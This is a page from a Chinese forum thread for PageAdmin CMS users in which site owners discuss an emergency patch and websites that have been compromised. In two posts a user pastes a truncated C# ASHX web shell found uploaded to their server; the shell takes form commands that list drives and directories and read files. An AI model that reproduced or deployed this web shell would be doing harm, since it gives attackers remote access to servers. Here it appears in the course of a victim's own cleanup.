PageAdmin网站内容管理系统(CMS)交流论坛

注册

 

QQ登录

只需一步,快速开始

返回列表 123
发新话题 回复该主题
楼主:xiyou

PageAdmin V3.0最新补丁发布[紧急](更新时间:2018-12-4) [复制链接]

xiyou
头像

  • 管理员
  • 16275
  • 27036
  • 2015-11-29
17#
t T
发表于 2018-12-01 16:40 |只看楼主

回复 14楼e0398的帖子

出现这个问题那就是因为木马没有清理干净导致的
PageAdmin CMS-想到就能做到!
TOP
lolchina
头像

  • PageAdmin学员
  • 127
  • 295
  • 2019-11-03
18#
t T
发表于 2018-12-03 15:15 |只看该用户

必须要赞!!!祝PA越来越好
TOP
qb211
头像

  • PageAdmin新手
  • 29
  • 66
  • 2013-03-08
19#
t T
发表于 2018-12-04 09:03 |只看该用户

升级后主页还是能被攻击
TOP
e0398
头像

  • PageAdmin熟手
  • 283
  • 503
  • 2009-07-23
20#
t T
发表于 2018-12-06 09:59 |只看该用户

总是被上传 ashx.ashx 以及 ashx_?.ashx 的文件。
文件的代码如下:
  1. <%@ WebHandler Language="C#" Class="Handler" %>

  3. using System;
  4. using System.Web;
  5. using System.IO;
  6. using System.Net;
  7. using System.Text;
  8. using System.Data;
  9. using System.Data.SqlClient;
  10. using System.Diagnostics;

  12. public class Handler : IHttpHandler
  13. {
  14.     public void ProcessRequest(HttpContext context)
  15.     {
  16.         String Z = context.Request.Form["@"];//
  17.         if (Z != "")
  18.         {
  19.             String Z1 = context.Request.Form["Z1"];
  20.             String Z2 = context.Request.Form["Z2"];
  21.             String R = "";
  22.             try
  23.             {
  24.                 switch (Z)
  25.                 {
  26.                     case "A":
  27.                         {
  28.                             String[] c = Directory.GetLogicalDrives();
  29.                             R = String.Format("{0}\t", context.Server.MapPath("/"));
  30.                             for (int i = 0; i < c.Length; i++)
  31.                                 R += c[i][0] + ":";
  32.                             break;
  33.                         }
  34.                     case "B":
  35.                         {
  36.                             DirectoryInfo m = new DirectoryInfo(Z1);
  37.                             foreach (DirectoryInfo D in m.GetDirectories())
  38.                             {
  39.                                 R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
  40.                             }
  41.                             foreach (FileInfo D in m.GetFiles())
  42.                             {
  43.                                 R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
  44.                             }
  45.                             break;
  46.                         }
  47.                     case "C":
  48.                         {
  49.                             StreamReader m = new StreamReader(Z1, Encoding.Default);
  50.                             R = m.ReadToEnd();
  51.                             m.Close();
  52.                             break;
  53.                         }
  54.                     case "D":
  55.                         {
  56.                        其他代码省略...
复制代码
TOP
e0398
头像

  • PageAdmin熟手
  • 283
  • 503
  • 2009-07-23
21#
t T
发表于 2018-12-06 10:25 |只看该用户

回复 17楼xiyou的帖子

总是被上传 ashx.ashx 以及 ashx_?.ashx 的文件。
文件的代码如下:
  1. <%@ WebHandler Language="C#" Class="Handler" %>

  3. using System;
  4. using System.Web;
  5. using System.IO;
  6. using System.Net;
  7. using System.Text;
  8. using System.Data;
  9. using System.Data.SqlClient;
  10. using System.Diagnostics;

  12. public class Handler : IHttpHandler
  13. {
  14.     public void ProcessRequest(HttpContext context)
  15.     {
  16.         String Z = context.Request.Form["@"];//
  17.         if (Z != "")
  18.         {
  19.             String Z1 = context.Request.Form["Z1"];
  20.             String Z2 = context.Request.Form["Z2"];
  21.             String R = "";
  22.             try
  23.             {
  24.                 switch (Z)
  25.                 {
  26.                     case "A":
  27.                         {
  28.                             String[] c = Directory.GetLogicalDrives();
  29.                             R = String.Format("{0}\t", context.Server.MapPath("/"));
  30.                             for (int i = 0; i < c.Length; i++)
  31.                                 R += c[i][0] + ":";
  32.                             break;
  33.                         }
  34.                     case "B":
  35.                         {
  36.                             DirectoryInfo m = new DirectoryInfo(Z1);
  37.                             foreach (DirectoryInfo D in m.GetDirectories())
  38.                             {
  39.                                 R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
  40.                             }
  41.                             foreach (FileInfo D in m.GetFiles())
  42.                             {
  43.                                 R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
  44.                             }
  45.                             break;
  46.                         }
  47.                     case "C":
  48.                         {
  49.                             StreamReader m = new StreamReader(Z1, Encoding.Default);
  50.                             R = m.ReadToEnd();
  51.                             m.Close();
  52.                             break;
  53.                         }
  54.                     case "D":
  55.                         {
  56.                        其他代码省略...
复制代码
TOP
xiyou
头像

  • 管理员
  • 16275
  • 27036
  • 2015-11-29
22#
t T
发表于 2018-12-06 10:39 |只看楼主

回复 21楼e0398的帖子

这种情况遇到很多用户,因为之前上传的木马伪装成aspx文件了,没有清理干净
PageAdmin CMS-想到就能做到!
TOP
zhao0427
头像

  • PageAdmin入门
  • 1
  • 1
  • 2018-12-06
23#
t T
发表于 2018-12-06 10:44 |只看该用户

能详细介绍下打补丁过程么,看不懂,不会弄
TOP
e0398
头像

  • PageAdmin熟手
  • 283
  • 503
  • 2009-07-23
24#
t T
发表于 2018-12-06 11:05 |只看该用户

回复 22楼xiyou的帖子

好的,我逐一查询所有代码。
ashx.ashx 这样的文件是木马吧?
TOP
schhd
头像

  • PageAdmin入门
  • 15
  • 30
  • 2014-09-20
25#
t T
发表于 2018-12-07 15:44 |只看该用户

[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256-2.aspx#163732]22楼[color=Olive]xiyou[/color]的帖子[/url][/b]

有打好补丁的最新的3.0源码吗?我们可以逐一对比一下,找出伪装的木马文件!或者有其它的更便捷的方法!
TOP
yishan5
头像

  • PageAdmin入门
  • 13
  • 25
  • 2014-05-08
26#
t T
发表于 2018-12-10 16:48 |只看该用户


Server Error in '/' Application.

zdy_location
  Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.IndexOutOfRangeException: zdy_location

Source Error:


An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.  

Stack Trace:



[IndexOutOfRangeException: zdy_location]
   System.Data.ProviderBase.FieldNameLookup.GetOrdinal(String fieldName) +5002922
   System.Data.OleDb.OleDbDataReader.GetOrdinal(String name) +68
   System.Data.OleDb.OleDbDataReader.get_Item(String name) +15
   PageAdmin.set.Get_Data() +1514
   PageAdmin.set.Page_Load(Object src, EventArgs e) +414
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
   System.Web.UI.Control.OnLoad(EventArgs e) +91
   System.Web.UI.Control.LoadRecursive() +74
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2207

后台能进,但是不能更新,点击网站管理里的“网站参数设置”就上面这样了,请赐教!
TOP
BA1AK
头像

  • PageAdmin入门
  • 3
  • 4
  • 2018-12-11
27#
t T
发表于 2018-12-11 13:36 |只看该用户

[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256.aspx#163643]1楼[color=Olive]xiyou[/color]的帖子[/url][/b]

求助,升级后,显示正常,后台无法登录了,症状是没有验证码,请问如何解决?
TOP
夏天2018
头像

  • PageAdmin入门
  • 20
  • 40
  • 2018-05-19
28#
t T
发表于 2018-12-11 15:27 |只看该用户

验证码的地方右击看看图片在不在,是不是升级的时候验证码的图片是不是丢失。
TOP
BA1AK
头像

  • PageAdmin入门
  • 3
  • 4
  • 2018-12-11
29#
t T
发表于 2018-12-11 16:36 |只看该用户

[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256-2.aspx#163784]28楼[color=Olive]夏天2018[/color]的帖子[/url][/b]

验证码图片就没有,也没有xxx
TOP
panyifan
头像

  • PageAdmin入门
  • 8
  • 16
  • 2009-07-16
30#
t T
发表于 2018-12-17 12:26 |只看该用户

PageAdmin V3用户论坛反馈了一些问题,经过和一些v3用户的确认,官方现在发布最新的升级补丁,补丁修复了目前反馈的各种问题,同时为了感谢大家对PageAdmin 3.0的支持,系统取消了顶部版权信息以表示感谢广大的V3用户的支持。

中毒了,网站不能正常进入,后台也进不了,升级了新补丁,知道后面情况会怎么样,

另外 顶部版权信息  还是有的,没有取消

这样 还是很容易被  抓取到,然后受到攻击。
TOP
BA1AK
头像

  • PageAdmin入门
  • 3
  • 4
  • 2018-12-11
31#
t T
发表于 2018-12-17 17:34 |只看该用户

[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256-2.aspx#163811]30楼[color=Olive]panyifan[/color]的帖子[/url][/b]

请问,后台没有验证码就没办法登陆的,如何解决?
TOP
weiyang016
头像

  • PageAdmin学员
  • 1982-1-6
  • 166
  • 280
  • 2012-03-23
32#
t T
发表于 2018-12-24 14:16 |只看该用户

http://你的域名/update.aspx,以后没有提示我升级呀
TOP
上一主题| 下一主题
返回列表 123
发新话题 回复该主题
高级编辑器高级编辑器